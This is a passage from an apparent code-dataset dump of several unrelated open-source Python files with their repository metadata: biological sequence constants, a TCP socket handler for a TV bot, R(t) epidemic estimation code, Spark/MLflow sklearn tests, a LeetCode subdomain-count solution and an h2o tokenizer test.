CAAUAAUAUGAGAAGGUGUAAAAUCAGUGUCCCUAACUAUUGUUUGGUGCCAAGUACCAUCUUGUUCAGUAAAAUAAGAAGCACCCCAGUAAAUAGCCCAAGCAUAAGCAACCAACCAUACCAAAUGAGUAAAAUUUCUUCUCAAUUCUUCUCUUGGAGUCAAAGCAGCCAAAUUUCUAUCUCUAGUUUUCCAUAAGUAACCCCACAAAAUAGAAGCAGUAACAAUUUCCAAAACAAUCUCCGUAUACAAGAAAUUCAUCCAAUAAGUUUCAAACUCCGGAGCGAAAGAAUCCAAACCAGCAGACCAGCCAUAAACCCCCUCAUACCAUCUAACCCACAAAUAAAAAACAGUGUAUAUAGCCAAAGCAAAUGUCAACCAUUUCUUAUCUAACAAUGGAGCUUCAGCAGCAGCAGCACCACCAAUAGUAGUAGCAGCCAUGGCCUUAGCAACAGCAACGAGUGUCAAUAAUGGUAAGAGUAGUUUCAU'
pMMO_aa_seq = 'MKLLLPLLTLVAVAKAMAATTIGGAAAAEAPLLDKKWLTFALAIYTVFYLWVRWYEGVYGWSAGLDSFAPEFETYWMNFLYTEIVLEIVTASILWGYLWKTRDRNLAALTPREELRRNFTHLVWLVAYAWAIYWGASYFTEQDGTWHQTIVRDTDFTPSHIIEFYLSYPIYIITGFAAFIYAKTRLPFFAKGISLPYLVLVVGPFMILPNVGLNEWGHTFWFMEELFVAPLHYGFVIFGWLALAVMGTLTQTFYRFAQGGLGQSLCEAVDEGLIAKMKTIKDRIAKWSAIGLLSAVAATAFYAPSASAHGEKSQAAFMRMRTIHWYDLSWSKEKVKINETVEIKGKFHVFEGWPETVDEPDVAFLNVGMPGPVFIRKESYIGGQLVPRSVRLEIGKTYDFRVVLKARRPGDWHVHTMMNVQGGGPIIGPGKWITVEGSMSEFRNPVTTLTGQTVDLENYNEGNTYFWHAFWFAIGVAWIGYWSRRPIFIPRLLMVDAGRADELVSATDRKVAMGFLAATILIVVMAMSSANSKYPITIPLQAGTMRGMKPLELPAPTVSVKVEDATYRVPGRAMRMKLTITNHGNSPIRLGEFYTASVRFLDSDVYKDTTGYPEDLLAEDGLSVSDNSPLAPGETRTVDVTASDAAWEVYRLSDIIYDPDSRFAGLLFFFDATGNRQVVQIDAPLIPSFMMVSKGEELFTGVVPILVELDGDVNGHKFSVSGEGEGDATYGKLTLKLICTTGKLPVPWPTLVTTLGYGLQCFARYPDHMKQHDFFKSAMPEGYVQERTIFFKDDGNYKTRAEVKFEGDTLVNRIELKGIDFKEDGNILGHKLEYNYNSHNVYITADKQKNGIKANFKIRHNIEDGGVQLADHYQQNTPIGDGPVLLPDNHYLSYQSKLSKDPNEKRDHMVLLEFVTAAGITLGMDELYKMKLLLPLLTLVAVAKAMSAAQSAVRSHAEAVQVSRTIDWMALFVVFFVIVGSYHIHAMLTMGDWDFWSDWKDRRLWVTVTPIVLVTFPAAVQSYLWERYRLPWGATVCVLGLLLGEWINRYFNFWGWTYFPINFVFPASLVPGAIILDTVLMLSGSYLFTAIVGAMGWGLIFYPGNWPIIAPLHVPVENNGMLMSIADIQGYNYVRTGTPEYIRMVEKGTLRTFGKDVAPVSAFFSAFMSILIYFMWHFIGRWFSNERFLQST'
hemo_dna_seq = 'ATGGGTGCTTTTACTGAAAAACAAGAGGCTTTGGTTTCTTCTAGCTTTGAAGCTTTTAAAGCTAACATTCCACAATATTCTGTTGTTTTTTATACTTCTATTTTGGAAAAAGCTCCTGCTGCTAAAGATTTGTTTTCTTTTTTGTCTAATGGTGTTGATCCATCTAATCCAAAATTGACTGGTCATGCTGAAAAATTGTTTGGTTTGGTTAGAGATTCTGCTGGTCAATTGAAAGCTAATGGTACTGTTGTTGCTGATGCTGCTTTGGGTTCTATTCATGCTCAAAAAGCTATTACTGATCCACAATTTGTTGTTGTTAAAGAAGCTTTGTTGAAAACTATTAAAGAAGCTGTTGGTGATAAATGGTCTGATGAATTGTCTTCTGCTTGGGAAGTTGCTTATGATGAATTGGCTGCTGCTATTAAAAAAGCTTTTAAAAGCTTTTTTAATAGCAGCAGCCAATTCATCATAAGCAACTTCCCAAGCAGAAGACAATTCATCAGACCATTTATCACCAACAGCTTCTTTAATAGTTTTCAACAAAGCTTCTTTAACAACAACAAATTGTGGATCAGTAATAGCTTTTTGAGCATGAATAGAACCCAAAGCAGCATCAGCAACAACAGTACCATTAGCTTTCAATTGACCAGCAGAATCTCTAACCAAACCAAACAATTTTTCAGCATGACCAGTCAATTTTGGATTAGATGGATCAACACCATTAGACAAAAAAGAAAACAAATCTTTAGCAGCAGGAGCTTTTTCCAAAATAGAAGTATAAAAAACAACAGAATATTGTGGAATGTTAGCTTTAAAAGCTTCAAAGCTAGAAGAAACCAAAGCCTCTTGTTTTTCAGTAAAAGCACCCATATGCTTCCAAGATTCTGGTGGGAATACTGCTGATAGCCTAACGTTCATGATCAAAATTTAACTGTTCTAACCCCTACTTGACAGGCAATATATAAACAGAAGGAAGCTGCCCTGTCTTAAACCTTTTTTTTTATCATCATTATTAGCTTACTTTCATAATTGCGACTGGTTCCAATTGACAAGCTTTTGATTTTAACGACTTTTAACGACAACTTGAGAAGATCAAAAAACAACTAATTATTCGAAACGATGGCTATCCCCGAAGAGTTTGATATCCTAGTTCTAGGTGGTGGATCCAGTGGATCCTGTATTGCCGGAAGATTGGCAAACTTGGACCACTCCTTGAAAGTACTTTCAAGGAGTGGTCCAAGTTTGCCAATCTTCCGGCAATACAGGATCCACTGGATCCACCACCTAGAACTAGGATATCAAACTCTTCGGGGATAGCCATCGTTTCGAATAATTAGTTGTTTTTTGATCTTCTCAAGTTGTCGTTAAAAGTCGTTAAAATCAAAAGCTTGTCAATTGGAACCAGTCGCAATTATGAAAGTAAGCTAATAATGATGATAAAAAAAAAGGTTTAAGACAGGGCAGCTTCCTTCTGTTTATATATTGCCTGTCAAGTAGGGGTTAGAACAGTTAAATTTTGATCATGAACGTTAGGCTATCAGCAGTATTCCCACCAGAATCTTGGAAGCATACTGACAATAAAAAGATTCTTGTTTTCAAGAACTTGTCATTTGTATAGTTTTTTTATATTGTAGTTGTTCTATTTTAATCAAATGTTAGCGTGATTTATATTTTTTTTCGCCTCGACATCATCTGCCCAGATGCGAAGTTAAGTGCGCAGAAAGTAATATCATGCGTCAATCGTATGTGAATGCTGGTCGCTATACTGCAGTATAGCGACCAGCATTCACATACGATTGACGCATGATATTACTTTCTGCGCACTTAACTTCGCATCTGGGCAGATGATGTCGAGGCGAAAAAAAATATAAATCACGCTAACATTTGATTAAAATAGAACAACTACAATATAAAAAAACTATACAAATGACAAGTTCTTGAAAACAAGAATCTTTTTATTGTCAGT'
hemo_rna_seq = 'AAAAGCUUUUUUAAUAGCAGCAGCCAAUUCAUCAUAAGCAACUUCCCAAGCAGAAGACAAUUCAUCAGACCAUUUAUCACCAACAGCUUCUUUAAUAGUUUUCAACAAAGCUUCUUUAACAACAACAAAUUGUGGAUCAGUAAUAGCUUUUUGAGCAUGAAUAGAACCCAAAGCAGCAUCAGCAACAACAGUACCAUUAGCUUUCAAUUGACCAGCAGAAUCUCUAACCAAACCAAACAAUUUUUCAGCAUGACCAGUCAAUUUUGGAUUAGAUGGAUCAACACCAUUAGACAAAAAAGAAAACAAAUCUUUAGCAGCAGGAGCUUUUUCCAAAAUAGAAGUAUAAAAAACAACAGAAUAUUGUGGAAUGUUAGCUUUAAAAGCUUCAAAGCUAGAAGAAACCAAAGCCUCUUGUUUUUCAGUAAAAGCACCCAU'
hemo_aa_seq = 'MGAFTEKQEALVSSSFEAFKANIPQYSVVFYTSILEKAPAAKDLFSFLSNGVDPSNPKLTGHAEKLFGLVRDSAGQLKANGTVVADAALGSIHAQKAITDPQFVVVKEALLKTIKEAVGDKWSDELSSAWEVAYDELAAAIKKAF' | 2,717.5 | 8,891 | 0.997853 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 16,212 | 0.994296 |
17da768787ed79973072983b3cce0e340bf8fc26 | 1,304 | py | Python | PythonSelenium/src/server.py | talhaHavadar/MomTV | 1673b8d41a3d6157b7e1ba5ba4bd3ad7a70a3ba9 | [
"MIT"
] | 1 | 2019-02-23T06:41:58.000Z | 2019-02-23T06:41:58.000Z | PythonSelenium/src/server.py | talhaHavadar/MomTV | 1673b8d41a3d6157b7e1ba5ba4bd3ad7a70a3ba9 | [
"MIT"
] | null | null | null | PythonSelenium/src/server.py | talhaHavadar/MomTV | 1673b8d41a3d6157b7e1ba5ba4bd3ad7a70a3ba9 | [
"MIT"
] | null | null | null | """
Handles all requests that coming from phone
"""
import socketserver
import bot
from bot import TVBot
class TCPSocketHandler(socketserver.StreamRequestHandler):
    """
    Handles the tcp socket connection.

    Reads newline-terminated commands from the phone and maps channel names
    (matched as case-insensitive substrings) to ``bot.TV_*`` channels, which
    are opened through a :class:`TVBot` instance.  A ``KAPAT``/``CLOSE``
    command shuts the bot down; the bot is also closed on disconnect.
    """

    # Ordered (keywords, channel) pairs.  The first entry whose keyword occurs
    # in the incoming command wins, preserving the original if/elif priority.
    _CHANNELS = (
        (("STAR",), bot.TV_STAR),
        (("ATV",), bot.TV_ATV),
        (("KANAL D", "KANALD"), bot.TV_KANALD),
        (("TRT",), bot.TV_TRT),
        (("FOX",), bot.TV_FOX),
        (("SHOW TV", "SHOW"), bot.TV_SHOW),
        (("TV2", "TV 2"), bot.TV_TV2),
    )

    def handle(self):
        self.bot = TVBot()
        while True:
            self.data = self.rfile.readline()
            if not self.data:
                break  # client disconnected
            self.data = self.data.decode()
            # Uppercase once per command; the original recomputed it for
            # every substring test.
            command = self.data.upper()
            for keywords, channel in self._CHANNELS:
                if any(keyword in command for keyword in keywords):
                    self.bot.open(channel)
                    break
            else:
                if "KAPAT" in command or "CLOSE" in command:
                    self.bot.close()
        self.bot.close()
| 34.315789 | 81 | 0.537577 | 1,192 | 0.91411 | 0 | 0 | 0 | 0 | 0 | 0 | 186 | 0.142638 |
17dbf62f58a11e99d5780b17f22714e9a8df977a | 3,640 | py | Python | pydemic/fitting/Rt.py | PyDemic/pydemic | 7e748e4bbe5c1f7fb209271af0ff8afb8fbd4fd5 | [
"MIT"
] | 3 | 2020-05-10T23:52:41.000Z | 2021-08-31T14:38:24.000Z | pydemic/fitting/Rt.py | PyDemic/pydemic | 7e748e4bbe5c1f7fb209271af0ff8afb8fbd4fd5 | [
"MIT"
] | 1 | 2020-09-27T03:26:51.000Z | 2022-03-30T12:18:08.000Z | pydemic/fitting/Rt.py | PyDemic/pydemic | 7e748e4bbe5c1f7fb209271af0ff8afb8fbd4fd5 | [
"MIT"
] | 1 | 2020-10-01T04:07:39.000Z | 2020-10-01T04:07:39.000Z | import pandas as pd
from . import K
from .epidemic_curves import epidemic_curve
from .utils import cases
from .. import formulas
from ..diseases import disease as get_disease
from ..docs import docstring
# Shared "Args:" section injected into the docstrings of the estimate_* and
# *_Rt functions below via the @docstring(args=ARGS) decorator.
ARGS = """Args:
    model ({'SIR', 'SEIR', 'SEAIR', etc}):
        Epidemic model used to compute R(t) from K(t)
    curves (pd.DataFrame):
        A dataframe with epidemic curves.
    window (int):
        Window size of triangular smoothing. Can be a single number or
        a 2-tuple with the window used to compute daily cases and the window
        used to smooth out the log-derivative.
    Re (bool):
        If True, return the effective reproduction number, instead of R0. Re
        does not consider the depletion of susceptibles and thus does not
        require knowing the population size.
    population:
        Required parameter to obtain R(t), if model is passed as a string.
        This may be required if params is initialized from a disease object.
    params:
        Optional object holding simulation params. This argument is not necessary
        if model can be treated as Params or if a disease is given.
"""

# Registries mapping method names to implementations; populated by @method().
METHODS_RT = {}
METHODS_R0 = {}
METHODS = {"Rt": METHODS_RT, "R0": METHODS_R0}
def method(which, names):
    """
    Register an implementation under one or more method names.

    Returns a decorator that stores the decorated function in the
    ``METHODS[which]`` registry (consumed by the estimate_Rt()/estimate_R()
    dispatchers) and returns the function unchanged.
    """
    if isinstance(names, str):
        names = [names]
    registry = METHODS[which]

    def register(fn):
        registry.update((alias, fn) for alias in names)
        return fn

    return register
@docstring(args=ARGS)
def estimate_Rt(model, curves: pd.DataFrame, method="RollingOLS", **kwargs) -> pd.DataFrame:
    """
    Estimate R(t) from epidemic curves and model.

    {args}

    Returns:
        A DataFrame with "Rt" and possibly other columns, depending on the
        method.

    See Also:
        naive_Rt
        rolling_OLS_Rt
    """
    # Dispatch to the implementation registered under the requested name.
    implementation = METHODS_RT[method]
    return implementation(model, curves, **kwargs)
@docstring(args=ARGS)
@method("Rt", "naive")
def naive_Rt(model, curves: pd.DataFrame, window=14, **kwargs) -> pd.DataFrame:
    """
    Naive inference of R(t) from Epidemic curves using the naive_Kt() function.

    {args}

    See Also:
        :func:`pydemic.fitting.K.naive_Kt`
    """
    growth = K.naive_Kt(curves, window=window)
    return Rt_from_Kt(model, curves, growth, **kwargs)
@docstring(args=ARGS)
@method("Rt", ["RollingOLS", "ROLS"])
def rolling_OLS_Rt(model: str, curves: pd.DataFrame, window=14, **kwargs):
    """
    Compute R(t) from K(t) using the K.rolling_ols() function.

    {args}

    See Also:
        :func:`pydemic.fitting.K.rolling_OLS_Kt`
    """
    growth = K.rolling_OLS_Kt(curves, window=window)
    return Rt_from_Kt(model, curves, growth, **kwargs)
#
# Auxiliary functions
#
def Rt_from_Kt(model, curves, Kt, Re=False, **kwargs) -> pd.DataFrame:
    """
    Return Rt from Kt for model.

    Wraps a common logic for many functions in this module.

    Args:
        model: Either an epidemic model name (e.g. "SIR") or an object exposing
            ``epidemic_model_name()``, in which case it is also used as params.
        curves: Epidemic curves, used to estimate the depletion of susceptibles
            when ``Re`` is False.
        Kt: DataFrame of K(t) series; columns named "Kt*" are renamed to "Rt*".
        Re: If True, return the effective reproduction number, skipping the
            susceptible-depletion correction.
        **kwargs: May contain ``params``; remaining keys are forwarded to
            ``formulas.R0_from_K``.
    """
    if isinstance(model, str):
        params = None
    else:
        params = model
        model = model.epidemic_model_name()

    params = kwargs.pop("params", params)
    if params is None:
        disease = get_disease()
        params = disease.params()

    # .items() replaces DataFrame.iteritems(), which was removed in pandas 2.0.
    rt = pd.DataFrame(
        {col: formulas.R0_from_K(model, params, K=data, **kwargs) for col, data in Kt.items()}
    )
    rt.columns = ["Rt" + c[2:] if c.startswith("Kt") else c for c in rt.columns]
    if Re:
        return rt

    # Correct R0 by the fraction of susceptibles still available at each time.
    data = epidemic_curve(model, cases(curves), params)
    depletion = data["susceptible"] / data.sum(1)
    rt /= depletion.values[:, None]
    return rt
| 27.164179 | 98 | 0.64533 | 0 | 0 | 0 | 0 | 1,183 | 0.325 | 0 | 0 | 1,811 | 0.497527 |
17dd134a81d8c44b28955eff31849c98b00f6958 | 5,099 | py | Python | python/tests/spark/sql/codegen/test_sklearn_flavor.py | askintution/rikai | 53a72a19beafc4097a816efb9cddd063e107e67a | [
"Apache-2.0"
] | 1 | 2022-02-18T07:53:29.000Z | 2022-02-18T07:53:29.000Z | python/tests/spark/sql/codegen/test_sklearn_flavor.py | askintution/rikai | 53a72a19beafc4097a816efb9cddd063e107e67a | [
"Apache-2.0"
] | null | null | null | python/tests/spark/sql/codegen/test_sklearn_flavor.py | askintution/rikai | 53a72a19beafc4097a816efb9cddd063e107e67a | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2021 Rikai Authors
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from pathlib import Path
import mlflow
import numpy as np
import pytest
from pyspark.sql import Row, SparkSession
from pyspark.sql.types import DoubleType, LongType, StructField, StructType
from sklearn.datasets import make_classification
from sklearn.decomposition import PCA
from sklearn.ensemble import RandomForestClassifier
from sklearn.linear_model import LinearRegression
import rikai
def test_sklearn_linear_regression(tmp_path: Path, spark: SparkSession):
    """Train a sklearn LinearRegression, log it via rikai/mlflow and score it with SQL."""
    # Prepare training data: y = x0 + 2*x1 + 3.
    features = np.array([[1, 1], [1, 2], [2, 2], [2, 3]])
    targets = np.dot(features, np.array([1, 2])) + 3
    model = LinearRegression()

    tmp_path.mkdir(parents=True, exist_ok=True)
    tracking_uri = "sqlite:///" + str(tmp_path / "tracking.db")
    mlflow.set_tracking_uri(tracking_uri)
    reg_model_name = "sklearn_linear_regression"
    model_name = "sk_lr_m"
    with mlflow.start_run():
        model.fit(features, targets)
        rikai.mlflow.sklearn.log_model(
            model,
            artifact_path="model",
            schema="double",
            registered_model_name=reg_model_name,
        )

    spark.conf.set(
        "spark.rikai.sql.ml.registry.mlflow.tracking_uri", tracking_uri
    )
    spark.sql(
        f"""
        CREATE MODEL {model_name} USING 'mlflow:///{reg_model_name}';
        """
    )
    spark.range(2).selectExpr("id as x0", "id+1 as x1").createOrReplaceTempView("tbl_X")

    predictions = spark.sql(
        f"""
        select ML_PREDICT({model_name}, array(x0, x1)) as pred from tbl_X
        """
    )

    assert predictions.schema == StructType([StructField("pred", DoubleType())])
    assert predictions.count() == 2
def test_sklearn_random_forest(tmp_path: Path, spark: SparkSession):
    """Log a RandomForestClassifier via rikai/mlflow and run ML_PREDICT on a 4-feature table."""
    features, labels = make_classification(
        n_samples=1000,
        n_features=4,
        n_informative=2,
        n_redundant=0,
        random_state=0,
        shuffle=False,
    )
    model = RandomForestClassifier(max_depth=2, random_state=0)

    tmp_path.mkdir(parents=True, exist_ok=True)
    tracking_uri = "sqlite:///" + str(tmp_path / "tracking.db")
    mlflow.set_tracking_uri(tracking_uri)
    reg_model_name = "sklearn_random_forest"
    model_name = "sk_rf_m"
    with mlflow.start_run():
        model.fit(features, labels)
        rikai.mlflow.sklearn.log_model(
            model,
            artifact_path="model",
            schema="long",
            registered_model_name=reg_model_name,
        )

    spark.conf.set(
        "spark.rikai.sql.ml.registry.mlflow.tracking_uri", tracking_uri
    )
    spark.sql(
        f"""
        CREATE MODEL {model_name} USING 'mlflow:///{reg_model_name}';
        """
    )
    spark.range(2).selectExpr(
        "id as x0", "id+1 as x1", "id+2 as x2", "id+3 as x3"
    ).createOrReplaceTempView("tbl_X")

    predictions = spark.sql(
        f"""
        select
          ML_PREDICT({model_name}, array(x0, x1, x2, x3)) as pred
        from tbl_X
        """
    )
    predictions.show()

    assert predictions.schema == StructType([StructField("pred", LongType())])
    assert (
        predictions.collect()
        == spark.createDataFrame([Row(pred=1), Row(pred=1)]).collect()
    )
def test_sklearn_pca(tmp_path: Path, spark: SparkSession):
    """Log a fitted PCA via rikai/mlflow and compare SQL prediction to sklearn transform."""
    samples = np.array([[-1, -1], [-2, -1], [-3, -2], [1, 1], [2, 1], [3, 2]])
    model = PCA(n_components=2)

    tmp_path.mkdir(parents=True, exist_ok=True)
    tracking_uri = "sqlite:///" + str(tmp_path / "tracking.db")
    mlflow.set_tracking_uri(tracking_uri)
    model_name = "sklearn_pca"
    reg_model_name = model_name
    with mlflow.start_run():
        model.fit(samples)
        rikai.mlflow.sklearn.log_model(
            model,
            "model",
            schema="array<float>",
            registered_model_name=reg_model_name,
        )

    spark.conf.set(
        "spark.rikai.sql.ml.registry.mlflow.tracking_uri", tracking_uri
    )
    spark.sql(
        f"""
        CREATE MODEL {model_name} USING 'mlflow:///{reg_model_name}';
        """
    )

    result = spark.sql(
        f"""
        select ML_PREDICT({model_name}, array(3, 2)) as pred
        """
    )
    result.show(1, vertical=False, truncate=False)

    # The SQL prediction should match transforming the same point directly.
    expected = model.transform([[3, 2]])[0]
    assert pytest.approx(result.head().pred) == expected
| 31.282209 | 79 | 0.596195 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1,663 | 0.326142 |
17ddf5f60cc34f1cbebcbf7f7b6413d3c56bbf83 | 813 | py | Python | Leetcode/week_2/p0811_subdomain_visit_count.py | SamSamhuns/wallbreakers_projekts | c07b555127ee89d6f461cea7cd87811c382086ff | [
"MIT"
] | 1 | 2021-07-07T00:55:23.000Z | 2021-07-07T00:55:23.000Z | Leetcode/week_2/p0811_subdomain_visit_count.py | SamSamhuns/wallbreakers_projekts | c07b555127ee89d6f461cea7cd87811c382086ff | [
"MIT"
] | null | null | null | Leetcode/week_2/p0811_subdomain_visit_count.py | SamSamhuns/wallbreakers_projekts | c07b555127ee89d6f461cea7cd87811c382086ff | [
"MIT"
] | null | null | null | from typing import List
from collections import defaultdict
class Solution:
    def subdomainVisits(self, cpdomains: List[str]) -> List[str]:
        """
        Aggregate visit counts for every domain and each of its parent domains.

        Each entry of ``cpdomains`` is "<count> <domain>"; every dot-suffix of
        the domain (e.g. "a.b.c" -> "a.b.c", "b.c", "c") accumulates the count.

        Returns a list of "<total> <domain>" strings, one per distinct domain.
        Runs in O(total number of domain fragments) time and space.
        """
        domain_visits = defaultdict(int)
        for cpdomain in cpdomains:
            count_str, domain = cpdomain.split()
            count = int(count_str)  # convert once instead of once per fragment
            fragments = domain.split('.')
            # Join suffixes directly instead of scanning for dot indices.
            for i in range(len(fragments)):
                domain_visits['.'.join(fragments[i:])] += count
        return [f"{visits} {dom}" for dom, visits in domain_visits.items()]
"""
Runtime: O(4N) ~ O(N) runtime
Space: O(N)
Runtime: 52 ms, faster than 73.52% of Python3 online submissions for Subdomain Visit Count.
Memory Usage: 12.8 MB, less than 100.00% of Python3 online submissions for Subdomain Visit Count.
"""
| 29.035714 | 97 | 0.646986 | 507 | 0.623616 | 0 | 0 | 0 | 0 | 0 | 0 | 246 | 0.302583 |
17de742785e7e376b1d10db620dbbd2f43d27408 | 15,752 | py | Python | h2o-bindings/bin/pyunit_parser_test.py | vishalbelsare/h2o-3 | 9322fb0f4c0e2358449e339a434f607d524c69fa | [
"Apache-2.0"
] | 6,098 | 2015-05-22T02:46:12.000Z | 2022-03-31T16:54:51.000Z | h2o-bindings/bin/pyunit_parser_test.py | vishalbelsare/h2o-3 | 9322fb0f4c0e2358449e339a434f607d524c69fa | [
"Apache-2.0"
] | 2,517 | 2015-05-23T02:10:54.000Z | 2022-03-30T17:03:39.000Z | h2o-bindings/bin/pyunit_parser_test.py | vishalbelsare/h2o-3 | 9322fb0f4c0e2358449e339a434f607d524c69fa | [
"Apache-2.0"
] | 2,199 | 2015-05-22T04:09:55.000Z | 2022-03-28T22:20:45.000Z | #!/usr/bin/env python
# -*- encoding: utf-8 -*-
"""Test case for pyparser."""
from __future__ import division, print_function
import os
import re
import textwrap
import tokenize
from future.builtins import open
import pyparser
def _make_tuple(op):
return lambda x: (op, x)
# Short aliases for tokenize token types, used to describe expected token
# streams in the tests below.
NL = tokenize.NL
NEWLINE = tokenize.NEWLINE
# NAME and OP carry a text payload, so they are matched as (type, text) pairs.
NAME = _make_tuple(tokenize.NAME)
OP = _make_tuple(tokenize.OP)
INDENT = tokenize.INDENT
DEDENT = tokenize.DEDENT
COMMENT = tokenize.COMMENT
STRING = tokenize.STRING
NUMBER = tokenize.NUMBER
END = tokenize.ENDMARKER
# Human-readable names for token types, used when reporting mismatched tokens.
token_names = {NL: "NL", NEWLINE: "NEWLINE", INDENT: "INDENT", COMMENT: "COMMENT", DEDENT: "DEDENT",
               STRING: "STRING", NUMBER: "NUMBER", END: "END", tokenize.OP: "OP", tokenize.NAME: "NAME"}
# Short aliases for pyparser parse-tree node classes; (class, kind) tuples
# distinguish sub-kinds of comments, import blocks and callables.
Ws = pyparser.Whitespace
Comment = pyparser.Comment
Comment_banner = (pyparser.Comment, "banner")
Comment_code = (pyparser.Comment, "code")
Docstring = pyparser.Docstring
Import_future = (pyparser.ImportBlock, "future")
Import_stdlib = (pyparser.ImportBlock, "stdlib")
Import_3rdpty = (pyparser.ImportBlock, "third-party")
Import_1stpty = (pyparser.ImportBlock, "first-party")
Expression = pyparser.Expression
Function = (pyparser.Callable, "def")
Class = (pyparser.Callable, "class")
def assert_same_code(code1, code2):
    """Verify whether 2 code fragments are identical, and if not print an error message.

    Trailing whitespace before a line-continuation backslash is normalized away
    before comparison.

    Raises:
        AssertionError: if the two (normalized) code fragments differ.
    """
    regex = re.compile(r"\s+\\$", re.M)
    code1 = re.sub(regex, r"\\", code1)
    code2 = re.sub(regex, r"\\", code2)
    if code2 != code1:
        print()
        lines_code1 = code1.splitlines()
        lines_code2 = code2.splitlines()
        n_diffs = 0
        # Iterate over the longer fragment so that trailing lines present only
        # in code2 are also reported (the previous loop ranged over code1 only
        # and silently skipped any extra lines of code2).
        for i in range(max(len(lines_code1), len(lines_code2))):
            old_line = lines_code1[i] if i < len(lines_code1) else ""
            new_line = lines_code2[i] if i < len(lines_code2) else ""
            if old_line != new_line:
                print("%3d - %s" % (i + 1, old_line))
                print("%3d + %s" % (i + 1, new_line))
                n_diffs += 1
                if n_diffs == 5:  # cap the report at five differences
                    break
        raise AssertionError("Unparsed code1 does not match the original.")
def test_tokenization():
    """
    Test function for ``pyparser._normalize_tokens()``.
    Even though this function is private, it is extremely important to verify that it behaves correctly. In
    particular, we want to check that it does not break the round-trip guarantee of the tokenizer, and that it
    fixes all the problems that the original tokenizer has.
    """
    # Helper functions
    def _parse_to_tokens(text):
        """Parse text into tokens and then normalize them."""
        # Py2 generators expose .next, Py3 __next__ -- support both.
        gen = iter(text.splitlines(True)) # True = keep newlines
        readline = gen.next if hasattr(gen, "next") else gen.__next__
        return pyparser._tokenize(readline)
    def _unparse_tokens(tokens):
        """Convert tokens back into the source code."""
        return tokenize.untokenize(t.token for t in tokens)
    def _assert_tokens(tokens, target):
        """Check that the tokens list corresponds to the target provided."""
        for i in range(len(tokens)):
            assert i < len(target), "Token %d %r not expected" % (i, tokens[i])
            tok = tokens[i]
            trg = target[i]
            valid = False
            # A bare int target matches the token type only; a (type, string)
            # pair (produced by NAME(...)/OP(...)) matches type and text.
            if isinstance(trg, int):
                if tok.op == trg: valid = True
                name = token_names[trg]
            elif isinstance(trg, tuple) and len(trg) == 2:
                if tok.op == trg[0] and tok.str == trg[1]: valid = True
                name = "%s(%s)" % (token_names[trg[0]], trg[1])
            else:
                assert False, "Unknown target: %r" % trg
            if not valid:
                assert False, "Mismatched token %d: found %r, should be %r" % (i, tok, name)
        assert len(target) == len(tokens), "Expected too many tokens: %d vs %d" % (len(tokens), len(target))
    def check_code(code, expected_tokens=None, filename=None):
        """Test parsing of the given piece of code."""
        code = textwrap.dedent(code)
        if filename:
            print("Testing tokenization of %s:" % filename, end=" ")
        else:
            # Number the anonymous fragments via an attribute on the function.
            check_code.index = getattr(check_code, "index", 0) + 1
            print("Testing tokenization %d:" % check_code.index, end=" ")
        tokens = _parse_to_tokens(code)
        try:
            try:
                unparsed = _unparse_tokens(tokens)
            except ValueError as e:
                raise AssertionError("Cannot unparse tokens: %s" % e)
            # Round-trip guarantee: untokenizing must reproduce the source.
            assert_same_code(code, unparsed)
            if expected_tokens:
                _assert_tokens(tokens, expected_tokens)
            print("ok")
        except AssertionError as e:
            print(u"Error: %s" % e)
            print(u"Original code fragment:\n" + code)
            print("Tokens:")
            for i, tok in enumerate(tokens):
                print("%3d %r" % (i, tok))
            raise
    # Three variants of the same try/while snippet; only the indentation of the
    # trailing comment differs, which changes where the DEDENTs are placed
    # relative to the COMMENT token in the normalized stream.
    check_code("""
        try:
            while True:
                pass
                # comment
        except: pass
        """, [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
              INDENT, NAME("pass"), NEWLINE, COMMENT, NL, DEDENT, DEDENT, NAME("except"), OP(":"),
              NAME("pass"), NEWLINE, END]
    )
    check_code("""
        try:
            while True:
                pass
            # comment
        except: pass
        """, [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
              INDENT, NAME("pass"), NEWLINE, DEDENT, COMMENT, NL, DEDENT, NAME("except"), OP(":"),
              NAME("pass"), NEWLINE, END]
    )
    check_code("""
        try:
            while True:
                pass
        # comment
        except: pass
        """, [NL, NAME("try"), OP(":"), NEWLINE, INDENT, NAME("while"), NAME("True"), OP(":"), NEWLINE,
              INDENT, NAME("pass"), NEWLINE, DEDENT, DEDENT, COMMENT, NL, NAME("except"), OP(":"),
              NAME("pass"), NEWLINE, END]
    )
    check_code("""
        def func():
            # function
            pass
        """, [NL, NAME("def"), NAME("func"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, COMMENT, NL,
              NAME("pass"), NEWLINE, DEDENT, END])
    check_code("""
        def func(): # function
            # hanging comment
            pass
        """, [NL, NAME("def"), NAME("func"), OP("("), OP(")"), OP(":"), COMMENT, NEWLINE, INDENT, COMMENT, NL,
              NAME("pass"), NEWLINE, DEDENT, END])
    check_code("""
        def foo():
            pass
        #comment
        def bar():
            pass
        """, [NL, NAME("def"), NAME("foo"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE,
              DEDENT, NL, COMMENT, NL, NAME("def"), NAME("bar"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT,
              NAME("pass"), NEWLINE, DEDENT, END])
    check_code("""
        def hello():
            print("hello")
        """, [NL, NAME("def"), NAME("hello"), OP("("), OP(")"), OP(":"), NEWLINE, INDENT, NL, NL,
              NAME("print"), OP("("), STRING, OP(")"), NEWLINE, DEDENT, END])
    check_code("""
        class Foo:
            def foo(self):
                pass
            def bar(self):
                return
        """, [NL, NAME("class"), NAME("Foo"), OP(":"), NEWLINE, INDENT, NAME("def"), NAME("foo"), OP("("),
              NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("pass"), NEWLINE, DEDENT, NL, NAME("def"),
              NAME("bar"), OP("("), NAME("self"), OP(")"), OP(":"), NEWLINE, INDENT, NAME("return"), NEWLINE, DEDENT,
              DEDENT, END])
